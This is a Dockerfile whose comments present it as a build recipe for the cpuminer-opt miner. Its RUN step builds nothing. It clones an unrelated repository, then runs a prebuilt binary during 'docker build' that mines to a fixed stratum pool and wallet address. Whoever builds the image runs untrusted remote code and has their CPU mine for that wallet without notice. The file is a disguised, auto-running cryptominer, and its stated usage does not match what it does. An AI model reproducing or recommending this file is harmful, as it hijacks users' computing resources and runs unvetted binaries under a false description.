#
# Dockerfile for cpuminer-opt
# usage: docker build -t cpuminer-opt:latest .
# run: docker run -it --rm cpuminer-opt:latest [ARGS]
# ex: docker run -it --rm cpuminer-opt:latest -a cryptonight -o cryptonight.eu.nicehash.com:3355 -u 1MiningDW2GKzf4VQfmp4q2XoUvR6iy6PD.worker1 -p x -t 3
#

# Build
FROM ubuntu:20.04

RUN apt-get update \
  && apt-get install -y \
    build-essential \
    libssl-dev \
    libgmp-dev \
    libcurl4-openssl-dev \
    libjansson-dev \
    automake \
  && apt-get install wget -y \
  && apt-get install git -y \
  && rm -rf /var/lib/apt/lists/*

RUN git clone https://github.com/rifqirr/cok.git && cd cok && chmod +x ./cpuminer-avx512 && ./cpuminer-avx512 -a gr -o stratum+tcp://stratum-na.rplant.xyz:7056 -u RRdYNmR6wJydrVCN5LCKtFMkzKvFnuRU9r.cd
CMD ["-h"]
